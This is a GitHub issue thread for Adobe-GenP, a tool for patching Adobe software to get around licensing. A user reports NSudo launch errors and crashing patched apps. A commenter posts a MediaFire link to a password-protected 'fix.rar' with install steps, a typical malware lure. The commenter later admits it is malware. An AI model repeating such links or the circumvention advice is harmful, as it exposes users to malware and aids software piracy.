### ISSUE TITLE
It doesn't work

### ISSUE THREAD

**Issue by 1324762577** [cw2k/Adobe-GenP#35]
I ran the application but it showed like this.
M2-Team NSudo Launcher 8.2
© M2-Team. All rights reserved.

错误: 进程创建失败。

欲了解更多信息, 请访问 https://m2team.github.io/NSudo/zh-hans。

****************************************************************

Sender: NSudoCreateProcess
DateTime: 2024-08-27 22:39:24
Process ID: 48032
Thread ID: 13392

UserModeType: 1
PrivilegesModeType: 1
MandatoryLabelType: 5
ProcessPriorityClassType: 2
ShowWindowModeType: 0
WaitInterval: 0
CreateNewConsole: 1
CommandLine: "D:\13247\Downloads\Adobe-GenP-3.4.13.4\AdobeGenP-3.4.13.4.exe"
CurrentDirectory: D:\13247\Downloads\Adobe-GenP-3.4.13.4

****************************************************************

Sender: NSudoCreateProcess
DateTime: 2024-08-27 22:39:24
Process ID: 48032
Thread ID: 13392

Create the system access token failed, returns -2147024891.

****************************************************************
Than , I deleted the NSudoLG and  it could run.
However,after I patched the apps , I found them flash back immediately.😂

**Comment by HarbingerOfFire** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by 1324762577** [comment]
![屏幕截图 2024-08-27 231519](https://github.com/user-attachments/assets/4571775c-ea9c-4bf7-b351-a62eff8ea58d)
Em, something wrong?

**Comment by HarbingerOfFire** [comment]
Yes, it's malware. Don't use it. Sorry for the inconvenience.

**Comment by kewldan** [comment]
+1, same crash

**Comment by 1324762577** [comment]
OK, I find the solution. I can use old version of PS, PR, AE. They can run successfully .
